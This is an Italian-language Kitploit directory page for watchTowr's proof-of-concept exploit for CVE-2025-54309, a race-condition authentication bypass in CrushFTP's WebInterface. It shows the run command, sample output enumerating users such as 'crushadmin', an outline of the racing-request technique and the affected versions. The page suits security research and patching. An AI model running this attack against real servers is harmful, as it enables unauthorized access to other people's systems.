Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
watchTowr-vs-CrushFTP-Authentication-Bypass-CVE-2025-54309 — Proof-of-concept exploit per CVE-2025-54309, che dimostra un bypass dell'autenticazione tramite race condition nella WebInterface di CrushFTP per enumerare gli utenti. | Kitploit
Strumenti/GitHubGitHub/watchtowrlabs/watchtowr-vs-crushftp-authentication-bypass-cve-2025-54309
Analisi delle VulnerabilitàExploitRaccolta InformazioniSicurezza WebPenetration TestingAutenticazione
GitHubwatchtowrlabs/watchtowr-vs-crushftp-authentication-bypass-cve-2025-54309

watchTowr-vs-CrushFTP-Authentication-Bypass-CVE-2025-54309

Proof-of-concept exploit per CVE-2025-54309, che dimostra un bypass dell'autenticazione tramite race condition nella WebInterface di CrushFTP per enumerare gli utenti.

Vedi Repository
28321 anno faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-54309

Una prova di concetto per il bypass dell'autenticazione di CrushFTP

Vedi il nostro post del blog per i dettagli tecnici

Rilevamento in azione

root@kitploit:~
python3 watchTowr-vs-CrushFTP-CVE-2025-54309.py http://127.0.0.1:8082
[*] Generated new c2f value: 6XDQ
                         __         ___  ___________                   
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________ 
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|   
                                  \/          \/     \/                            
          
        watchTowr-vs-CrushFTP-CVE-2025-54309.py
        (*) CrushFTP Authentication Bypass Race Condition PoC
        
          - Sonny , watchTowr ([email protected])

        CVEs: [CVE-2025-54309]
        
[*] CRUSHFTP RACE CONDITION POC
[*] TARGET: http://127.0.0.1:8082
[*] ENDPOINT: CrushFTP WebInterface getUserList
[*] ATTACK: 5000 requests with new c2f every 50 requests
============================================================
Starting race with 5000 request pairs...
============================================================
[*] Generated new c2f value: qUwd
[*] NEW SESSION: c2f=qUwd
[*] EXFILTRATED 3 USERS: crushadmin, default, TempAccount
[*] VULNERABLE! RACE CONDITION POSSIBLE!

Descrizione

Questo script è una prova di concetto per CVE-2025-54309 contro le interfacce CrushFTP. Creando una serie di richieste race che condividono gli stessi identificatori di sessione, una richiesta per impostare la proprietà username su "crushadmin" e una richiesta per eseguire un comando autenticato come questo utente, in questa PoC è possibile estrarre l'elenco dei nomi utente. Ulteriori dettagli sono descritti nel nostro [post del blog] (https://labs.watchtowr.com/).

Versioni interessate

  • prima della 10.8.5
  • 11 precedenti alla 11.3.4_23

Ulteriori dettagli nell'avviso di CrushFTP

Segui watchTowr Labs

Per le ultime ricerche di sicurezza, segui il team dei Labs di watchTowr

  • https://labs.watchtowr.com/
  • https://x.com/watchtowrcyber
Scarica lo strumento